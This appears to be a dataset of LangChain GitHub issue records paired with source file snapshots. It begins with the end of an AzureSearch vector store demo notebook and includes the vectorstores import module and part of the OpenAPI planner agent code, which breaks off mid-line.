Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n", " 0.82153815)]\n" ] } ], "source": [ "docs_and_scores = vector_store.similarity_search_with_relevance_scores(query=\"What did the president say about Ketanji Brown Jackson\", k=4, score_threshold=0.80)\n", "from pprint import pprint\n", "pprint(docs_and_scores)" ] }, { "attachments": {}, "cell_type": "markdown", "metadata": {}, "source": [ "## Perform a Hybrid Search\n", "\n", "Execute hybrid search using the search_type or hybrid_search() method:" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a hybrid search\n", "docs = vector_store.similarity_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\",\n", " k=3, \n", " search_type=\"hybrid\"\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n" ] } ], "source": [ "# Perform a hybrid search\n", "docs = vector_store.hybrid_search(\n", " query=\"What did the president say about Ketanji Brown Jackson\", \n", " k=3\n", ")\n", "print(docs[0].page_content)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Create a new index with custom filterable fields " ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [], "source": [ "from azure.search.documents.indexes.models import (\n", " SearchableField,\n", " SearchField,\n", " SearchFieldDataType,\n", " SimpleField,\n", " ScoringProfile,\n", " TextWeights,\n", ")\n", "\n", "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "embedding_function = embeddings.embed_query\n", "\n", "fields = [\n", " SimpleField(\n", " name=\"id\",\n", " type=SearchFieldDataType.String,\n", " key=True,\n", " filterable=True,\n", " ),\n", " SearchableField(\n", " name=\"content\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " SearchField(\n", " name=\"content_vector\",\n", " type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n", " searchable=True,\n", " vector_search_dimensions=len(embedding_function(\"Text\")),\n", " vector_search_configuration=\"default\",\n", " ),\n", " SearchableField(\n", " name=\"metadata\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field to store the title\n", " SearchableField(\n", " name=\"title\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field for filtering on document source\n", " SimpleField(\n", " name=\"source\",\n", " type=SearchFieldDataType.String,\n", " filterable=True,\n", " ),\n", "]\n", "\n", "index_name: str = \"langchain-vector-demo-custom\"\n", "\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embedding_function,\n", " fields=fields,\n", ")\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Perform a query with a custom filter" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [], "source": [ "# Data in the metadata dictionary with a corresponding field in the index will be added to the index\n", "# In this example, the metadata dictionary contains a title, a source and a random field\n", "# The title and the source will be added to the index as separate fields, but the random won't. (as it is not defined in the fields list)\n", "# The random field will be only stored in the metadata field\n", "vector_store.add_texts(\n", " [\"Test 1\", \"Test 2\", \"Test 3\"],\n", " [\n", " {\"title\": \"Title 1\", \"source\": \"A\", \"random\": \"10290\"},\n", " {\"title\": \"Title 2\", \"source\": \"A\", \"random\": \"48392\"},\n", " {\"title\": \"Title 3\", \"source\": \"B\", \"random\": \"32893\"},\n", " ],\n", ")\n" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 3', metadata={'title': 'Title 3', 'source': 'B', 'random': '32893'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n", " Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]" ] }, "execution_count": 12, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\")\n", "res" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'A', 'random': '10290'}),\n", " Document(page_content='Test 2', metadata={'title': 'Title 2', 'source': 'A', 'random': '48392'})]" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 3 source1\", k=3, search_type=\"hybrid\", filters=\"source eq 'A'\")\n", "res" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Create a new index with a Scoring Profile" ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [], "source": [ "from azure.search.documents.indexes.models import (\n", " SearchableField,\n", " SearchField,\n", " SearchFieldDataType,\n", " SimpleField,\n", " ScoringProfile,\n", " TextWeights,\n", " ScoringFunction,\n", " FreshnessScoringFunction,\n", " FreshnessScoringParameters\n", ")\n", "\n", "embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n", "embedding_function = embeddings.embed_query\n", "\n", "fields = [\n", " SimpleField(\n", " name=\"id\",\n", " type=SearchFieldDataType.String,\n", " key=True,\n", " filterable=True,\n", " ),\n", " SearchableField(\n", " name=\"content\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " SearchField(\n", " name=\"content_vector\",\n", " type=SearchFieldDataType.Collection(SearchFieldDataType.Single),\n", " searchable=True,\n", " vector_search_dimensions=len(embedding_function(\"Text\")),\n", " vector_search_configuration=\"default\",\n", " ),\n", " SearchableField(\n", " name=\"metadata\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field to store the title\n", " SearchableField(\n", " name=\"title\",\n", " type=SearchFieldDataType.String,\n", " searchable=True,\n", " ),\n", " # Additional field for filtering on document source\n", " SimpleField(\n", " name=\"source\",\n", " type=SearchFieldDataType.String,\n", " filterable=True,\n", " ),\n", " # Additional data field for last doc update\n", " SimpleField(\n", " name=\"last_update\",\n", " type=SearchFieldDataType.DateTimeOffset,\n", " searchable=True,\n", " filterable=True\n", " )\n", "]\n", "# Adding a custom scoring profile with a freshness function\n", "sc_name = \"scoring_profile\"\n", "sc = ScoringProfile(\n", " name=sc_name,\n", " text_weights=TextWeights(weights={\"title\": 5}),\n", " function_aggregation=\"sum\",\n", " functions=[\n", " FreshnessScoringFunction(\n", " field_name=\"last_update\",\n", " boost=100,\n", " parameters=FreshnessScoringParameters(boosting_duration=\"P2D\"),\n", " interpolation=\"linear\"\n", " )\n", " ]\n", ")\n", "\n", "index_name = \"langchain-vector-demo-custom-scoring-profile\"\n", "\n", "vector_store: AzureSearch = AzureSearch(\n", " azure_search_endpoint=vector_store_address,\n", " azure_search_key=vector_store_password,\n", " index_name=index_name,\n", " embedding_function=embeddings.embed_query,\n", " fields=fields,\n", " scoring_profiles = [sc],\n", " default_scoring_profile = sc_name\n", ")" ] }, { "cell_type": "code", "execution_count": 23, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['NjQyNTI5ZmMtNmVkYS00Njg5LTk2ZDgtMjM3OTY4NTJkYzFj',\n", " 'M2M0MGExZjAtMjhiZC00ZDkwLThmMTgtODNlN2Y2ZDVkMTMw',\n", " 'ZmFhMDE1NzMtMjZjNS00MTFiLTk0MTEtNGRkYjgwYWQwOTI0']" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Adding same data with different last_update to show Scoring Profile effect\n", "from datetime import datetime, timedelta\n", "\n", "today = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "yesterday = (datetime.utcnow() - timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "one_month_ago = (datetime.utcnow() - timedelta(days=30)).strftime('%Y-%m-%dT%H:%M:%S-00:00')\n", "\n", "vector_store.add_texts(\n", " [\"Test 1\", \"Test 1\", \"Test 1\"],\n", " [\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"10290\", \"last_update\": today},\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"48392\", \"last_update\": yesterday},\n", " {\"title\": \"Title 1\", \"source\": \"source1\", \"random\": \"32893\", \"last_update\": one_month_ago},\n", " ],\n", ")\n" ] }, { "cell_type": "code", "execution_count": 24, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '10290', 'last_update': '2023-07-13T10:47:39-00:00'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '48392', 'last_update': '2023-07-12T10:47:39-00:00'}),\n", " Document(page_content='Test 1', metadata={'title': 'Title 1', 'source': 'source1', 'random': '32893', 'last_update': '2023-06-13T10:47:39-00:00'})]" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "res = vector_store.similarity_search(query=\"Test 1\", k=3, search_type=\"similarity\")\n", "res" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "kernelspec": { "display_name": "Python 3.9.13 ('.venv': venv)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.9.13" }, "orig_nbformat": 4, "vscode": { "interpreter": { "hash": "645053d6307d413a1a75681b5ebb6449bb2babba4bcb0bf65a1ddc3dbefb108a" } } }, "nbformat": 4, "nbformat_minor": 2 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/langchain/vectorstores/__init__.py
"""**Vector store** stores embedded data and performs vector search. One of the most common ways to store and search over unstructured data is to embed it and store the resulting embedding vectors, and then query the store and retrieve the data that are 'most similar' to the embedded query. **Class hierarchy:** .. code-block:: VectorStore --> <name> # Examples: Annoy, FAISS, Milvus BaseRetriever --> VectorStoreRetriever --> <name>Retriever # Example: VespaRetriever **Main helpers:** .. code-block:: Embeddings, Document """ # noqa: E501 from typing import Any from langchain.schema.vectorstore import VectorStore def _import_alibaba_cloud_open_search() -> Any: from langchain.vectorstores.alibabacloud_opensearch import AlibabaCloudOpenSearch return AlibabaCloudOpenSearch def _import_alibaba_cloud_open_search_settings() -> Any: from langchain.vectorstores.alibabacloud_opensearch import ( AlibabaCloudOpenSearchSettings, ) return AlibabaCloudOpenSearchSettings def _import_elastic_knn_search() -> Any: from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch return ElasticKnnSearch def _import_elastic_vector_search() -> Any: from langchain.vectorstores.elastic_vector_search import ElasticVectorSearch return ElasticVectorSearch def _import_analyticdb() -> Any: from langchain.vectorstores.analyticdb import AnalyticDB return AnalyticDB def _import_annoy() -> Any: from langchain.vectorstores.annoy import Annoy return Annoy def _import_atlas() -> Any: from langchain.vectorstores.atlas import AtlasDB return AtlasDB def _import_awadb() -> Any: from langchain.vectorstores.awadb import AwaDB return AwaDB def _import_azuresearch() -> Any: from langchain.vectorstores.azuresearch import AzureSearch return AzureSearch def _import_bageldb() -> Any: from langchain.vectorstores.bageldb import Bagel return Bagel def _import_cassandra() -> Any: from langchain.vectorstores.cassandra import Cassandra return Cassandra def _import_chroma() -> Any: from langchain.vectorstores.chroma import Chroma return Chroma def _import_clarifai() -> Any: from langchain.vectorstores.clarifai import Clarifai return Clarifai def _import_clickhouse() -> Any: from langchain.vectorstores.clickhouse import Clickhouse return Clickhouse def _import_clickhouse_settings() -> Any: from langchain.vectorstores.clickhouse import ClickhouseSettings return ClickhouseSettings def _import_dashvector() -> Any: from langchain.vectorstores.dashvector import DashVector return DashVector def _import_deeplake() -> Any: from langchain.vectorstores.deeplake import DeepLake return DeepLake def _import_dingo() -> Any: from langchain.vectorstores.dingo import Dingo return Dingo def _import_docarray_hnsw() -> Any: from langchain.vectorstores.docarray import DocArrayHnswSearch return DocArrayHnswSearch def _import_docarray_inmemory() -> Any: from langchain.vectorstores.docarray import DocArrayInMemorySearch return DocArrayInMemorySearch def _import_elasticsearch() -> Any: from langchain.vectorstores.elasticsearch import ElasticsearchStore return ElasticsearchStore def _import_epsilla() -> Any: from langchain.vectorstores.epsilla import Epsilla return Epsilla def _import_faiss() -> Any: from langchain.vectorstores.faiss import FAISS return FAISS def _import_hologres() -> Any: from langchain.vectorstores.hologres import Hologres return Hologres def _import_lancedb() -> Any: from langchain.vectorstores.lancedb import LanceDB return LanceDB def _import_llm_rails() -> Any: from langchain.vectorstores.llm_rails import LLMRails return LLMRails def _import_marqo() -> Any: from langchain.vectorstores.marqo import Marqo return Marqo def _import_matching_engine() -> Any: from langchain.vectorstores.matching_engine import MatchingEngine return MatchingEngine def _import_meilisearch() -> Any: from langchain.vectorstores.meilisearch import Meilisearch return Meilisearch def _import_milvus() -> Any: from langchain.vectorstores.milvus import Milvus return Milvus def _import_momento_vector_index() -> Any: from langchain.vectorstores.momento_vector_index import MomentoVectorIndex return MomentoVectorIndex def _import_mongodb_atlas() -> Any: from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch return MongoDBAtlasVectorSearch def _import_myscale() -> Any: from langchain.vectorstores.myscale import MyScale return MyScale def _import_myscale_settings() -> Any: from langchain.vectorstores.myscale import MyScaleSettings return MyScaleSettings def _import_neo4j_vector() -> Any: from langchain.vectorstores.neo4j_vector import Neo4jVector return Neo4jVector def _import_opensearch_vector_search() -> Any: from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch return OpenSearchVectorSearch def _import_pgembedding() -> Any: from langchain.vectorstores.pgembedding import PGEmbedding return PGEmbedding def _import_pgvector() -> Any: from langchain.vectorstores.pgvector import PGVector return PGVector def _import_pinecone() -> Any: from langchain.vectorstores.pinecone import Pinecone return Pinecone def _import_qdrant() -> Any: from langchain.vectorstores.qdrant import Qdrant return Qdrant def _import_redis() -> Any: from langchain.vectorstores.redis import Redis return Redis def _import_rocksetdb() -> Any: from langchain.vectorstores.rocksetdb import Rockset return Rockset def _import_vespa() -> Any: from langchain.vectorstores.vespa import VespaStore return VespaStore def _import_scann() -> Any: from langchain.vectorstores.scann import ScaNN return ScaNN def _import_singlestoredb() -> Any: from langchain.vectorstores.singlestoredb import SingleStoreDB return SingleStoreDB def _import_sklearn() -> Any: from langchain.vectorstores.sklearn import SKLearnVectorStore return SKLearnVectorStore def _import_sqlitevss() -> Any: from langchain.vectorstores.sqlitevss import SQLiteVSS return SQLiteVSS def _import_starrocks() -> Any: from langchain.vectorstores.starrocks import StarRocks return StarRocks def _import_supabase() -> Any: from langchain.vectorstores.supabase import SupabaseVectorStore return SupabaseVectorStore def _import_tair() -> Any: from langchain.vectorstores.tair import Tair return Tair def _import_tencentvectordb() -> Any: from langchain.vectorstores.tencentvectordb import TencentVectorDB return TencentVectorDB def _import_tigris() -> Any: from langchain.vectorstores.tigris import Tigris return Tigris def _import_timescalevector() -> Any: from langchain.vectorstores.timescalevector import TimescaleVector return TimescaleVector def _import_typesense() -> Any: from langchain.vectorstores.typesense import Typesense return Typesense def _import_usearch() -> Any: from langchain.vectorstores.usearch import USearch return USearch def _import_vald() -> Any: from langchain.vectorstores.vald import Vald return Vald def _import_vearch() -> Any: from langchain.vectorstores.vearch import Vearch return Vearch def _import_vectara() -> Any: from langchain.vectorstores.vectara import Vectara return Vectara def _import_weaviate() -> Any: from langchain.vectorstores.weaviate import Weaviate return Weaviate def _import_zep() -> Any: from langchain.vectorstores.zep import ZepVectorStore return ZepVectorStore def _import_zilliz() -> Any: from langchain.vectorstores.zilliz import Zilliz return Zilliz def __getattr__(name: str) -> Any: if name == "AnalyticDB": return _import_analyticdb() elif name == "AlibabaCloudOpenSearch": return _import_alibaba_cloud_open_search() elif name == "AlibabaCloudOpenSearchSettings": return _import_alibaba_cloud_open_search_settings() elif name == "ElasticKnnSearch": return _import_elastic_knn_search() elif name == "ElasticVectorSearch": return _import_elastic_vector_search() elif name == "Annoy": return _import_annoy() elif name == "AtlasDB": return _import_atlas() elif name == "AwaDB": return _import_awadb() elif name == "AzureSearch": return _import_azuresearch() elif name == "Bagel": return _import_bageldb() elif name == "Cassandra": return _import_cassandra() elif name == "Chroma": return _import_chroma() elif name == "Clarifai": return _import_clarifai() elif name == "ClickhouseSettings": return _import_clickhouse_settings() elif name == "Clickhouse": return _import_clickhouse() elif name == "DashVector": return _import_dashvector() elif name == "DeepLake": return _import_deeplake() elif name == "Dingo": return _import_dingo() elif name == "DocArrayInMemorySearch": return _import_docarray_inmemory() elif name == "DocArrayHnswSearch": return _import_docarray_hnsw() elif name == "ElasticsearchStore": return _import_elasticsearch() elif name == "Epsilla": return _import_epsilla() elif name == "FAISS": return _import_faiss() elif name == "Hologres": return _import_hologres() elif name == "LanceDB": return _import_lancedb() elif name == "LLMRails": return _import_llm_rails() elif name == "Marqo": return _import_marqo() elif name == "MatchingEngine": return _import_matching_engine() elif name == "Meilisearch": return _import_meilisearch() elif name == "Milvus": return _import_milvus() elif name == "MomentoVectorIndex": return _import_momento_vector_index() elif name == "MongoDBAtlasVectorSearch": return _import_mongodb_atlas() elif name == "MyScaleSettings": return _import_myscale_settings() elif name == "MyScale": return _import_myscale() elif name == "Neo4jVector": return _import_neo4j_vector() elif name == "OpenSearchVectorSearch": return _import_opensearch_vector_search() elif name == "PGEmbedding": return _import_pgembedding() elif name == "PGVector": return _import_pgvector() elif name == "Pinecone": return _import_pinecone() elif name == "Qdrant": return _import_qdrant() elif name == "Redis": return _import_redis() elif name == "Rockset": return _import_rocksetdb() elif name == "ScaNN": return _import_scann() elif name == "SingleStoreDB": return _import_singlestoredb() elif name == "SKLearnVectorStore": return _import_sklearn() elif name == "SQLiteVSS": return _import_sqlitevss() elif name == "StarRocks": return _import_starrocks() elif name == "SupabaseVectorStore": return _import_supabase() elif name == "Tair": return _import_tair() elif name == "TencentVectorDB": return _import_tencentvectordb() elif name == "Tigris": return _import_tigris() elif name == "TimescaleVector": return _import_timescalevector() elif name == "Typesense": return _import_typesense() elif name == "USearch": return _import_usearch() elif name == "Vald": return _import_vald() elif name == "Vearch": return _import_vearch() elif name == "Vectara": return _import_vectara() elif name == "Weaviate": return _import_weaviate() elif name == "ZepVectorStore": return _import_zep() elif name == "Zilliz": return _import_zilliz() elif name == "VespaStore": return _import_vespa() else: raise AttributeError(f"Could not find: {name}") __all__ = [ "AlibabaCloudOpenSearch", "AlibabaCloudOpenSearchSettings", "AnalyticDB", "Annoy", "Annoy", "AtlasDB", "AtlasDB", "AwaDB", "AzureSearch", "Bagel", "Cassandra", "Chroma", "Chroma", "Clarifai", "Clickhouse", "ClickhouseSettings", "DashVector", "DeepLake", "DeepLake", "Dingo", "DocArrayHnswSearch", "DocArrayInMemorySearch", "ElasticKnnSearch", "ElasticVectorSearch", "ElasticsearchStore", "Epsilla", "FAISS", "Hologres", "LanceDB", "LLMRails", "Marqo", "MatchingEngine", "Meilisearch", "Milvus", "MomentoVectorIndex", "MongoDBAtlasVectorSearch", "MyScale", "MyScaleSettings", "Neo4jVector", "OpenSearchVectorSearch", "OpenSearchVectorSearch", "PGEmbedding", "PGVector", "Pinecone", "Qdrant", "Redis", "Rockset", "SKLearnVectorStore", "ScaNN", "SingleStoreDB", "SingleStoreDB", "SQLiteVSS", "StarRocks", "SupabaseVectorStore", "Tair", "Tigris", "TimescaleVector", "Typesense", "USearch", "Vald", "Vearch", "Vectara", "VectorStore", "VespaStore", "Weaviate", "ZepVectorStore", "Zilliz", "Zilliz", "TencentVectorDB", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/langchain/vectorstores/azure_cosmos_db.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request ### Feature request Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure. [Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search) ### Motivation This capability described in the feature request is currently not available for Langchain Python. ### Your contribution I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/tests/integration_tests/vectorstores/test_azure_cosmos_db.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
2,938
Allow OpenAPI planner to respect URLs with placeholders
In OpenAPI documentation, an endpoint might include a placeholder for a parameter: ``` GET /states/{abbr} ``` Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
https://github.com/langchain-ai/langchain/issues/2938
https://github.com/langchain-ai/langchain/pull/2940
e42a576cb2973e36f310e1db45d75b8fa5ba9cf6
48cf9783913077fdad7c26752c7a70b20b57fb30
"2023-04-15T13:54:15Z"
python
"2023-10-12T23:20:32Z"
libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py
"""Agent that interacts with OpenAPI APIs via a hierarchical planning approach.""" import json import re from functools import partial from typing import Any, Callable, Dict, List, Optional import yaml from langchain.agents.agent import AgentExecutor from langchain.agents.agent_toolkits.openapi.planner_prompt import ( API_CONTROLLER_PROMPT, API_CONTROLLER_TOOL_DESCRIPTION, API_CONTROLLER_TOOL_NAME, API_ORCHESTRATOR_PROMPT, API_PLANNER_PROMPT, API_PLANNER_TOOL_DESCRIPTION, API_PLANNER_TOOL_NAME, PARSING_DELETE_PROMPT, PARSING_GET_PROMPT, PARSING_PATCH_PROMPT, PARSING_POST_PROMPT, PARSING_PUT_PROMPT, REQUESTS_DELETE_TOOL_DESCRIPTION, REQUESTS_GET_TOOL_DESCRIPTION, REQUESTS_PATCH_TOOL_DESCRIPTION, REQUESTS_POST_TOOL_DESCRIPTION, REQUESTS_PUT_TOOL_DESCRIPTION, ) from langchain.agents.agent_toolkits.openapi.spec import ReducedOpenAPISpec from langchain.agents.mrkl.base import ZeroShotAgent from langchain.agents.tools import Tool from langchain.callbacks.base import BaseCallbackManager from langchain.chains.llm import LLMChain from langchain.llms.openai import OpenAI from langchain.memory import ReadOnlySharedMemory from langchain.prompts import PromptTemplate from langchain.pydantic_v1 import Field from langchain.schema import BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel from langchain.tools.base import BaseTool from langchain.tools.requests.tool import BaseRequestsTool from langchain.utilities.requests import RequestsWrapper # # Requests tools with LLM-instructed extraction of truncated responses. # # Of course, truncating so bluntly may lose a lot of valuable # information in the response. # However, the goal for now is to have only a single inference step. MAX_RESPONSE_LENGTH = 5000 """Maximum length of the response to be returned.""" def _get_default_llm_chain(prompt: BasePromptTemplate) -> LLMChain: return LLMChain( llm=OpenAI(), prompt=prompt, ) def _get_default_llm_chain_factory( prompt: BasePromptTemplate, ) -> Callable[[], LLMChain]: """Returns a default LLMChain factory.""" return partial(_get_default_llm_chain, prompt) class RequestsGetToolWithParsing(BaseRequestsTool, BaseTool): """Requests GET tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_get" """Tool name.""" description = REQUESTS_GET_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_GET_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e data_params = data.get("params") response = self.requests_wrapper.get(data["url"], params=data_params) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPostToolWithParsing(BaseRequestsTool, BaseTool): """Requests POST tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_post" """Tool name.""" description = REQUESTS_POST_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_POST_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.post(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPatchToolWithParsing(BaseRequestsTool, BaseTool): """Requests PATCH tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_patch" """Tool name.""" description = REQUESTS_PATCH_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_PATCH_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.patch(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPutToolWithParsing(BaseRequestsTool, BaseTool): """Requests PUT tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_put" """Tool name.""" description = REQUESTS_PUT_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_PUT_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.put(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise 